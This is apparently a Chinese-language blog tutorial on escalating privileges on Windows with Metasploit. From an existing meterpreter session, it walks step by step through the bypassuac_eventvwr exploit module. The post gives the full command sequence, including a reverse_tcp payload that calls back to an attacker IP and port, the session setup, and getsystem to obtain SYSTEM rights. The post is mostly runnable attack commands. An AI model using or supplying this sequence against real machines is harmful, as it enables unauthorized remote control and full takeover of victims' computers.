msf_bypassuac提权

反弹msf之前也发了好几篇了,这里小伙子就直接利用已经反弹回来的meterpreter进行uac提权了


一.现在利用meterpreter的getuid进行查看权限,getuid.

msf_bypassuac提权

这就是一个普通的用户

二.直接利用msf的getsystem尝试提权,getsystem

msf_bypassuac提权

显示提权失败

三.把这个sessions后台运行,background

msf_bypassuac提权

四.使用bypassuac模块,use exploit/windows/local/bypassuac_eventvwr

msf_bypassuac提权

五.对参数进行设置

set payload windows/meterpreter/reverse_tcp

set LHOST 192.168.43.79(本机ip)

set LPORT 8888(本机接受的端口)

set target 1 (设置1为x64的,0为x86的,可以show targets进行查看)

set SESSION 1(指向我们刚刚后台运行的那个session)

msf_bypassuac提权

show options  查看设置是否有错

msf_bypassuac提权

运行生成一个新的session,exploit

msf_bypassuac提权

进入新的session后,getsystem

msf_bypassuac提权

getuid查看下权限

msf_bypassuac提权

提权成功


感谢各位大佬赏脸,有什么不足的地方请多多指教,谢谢!!!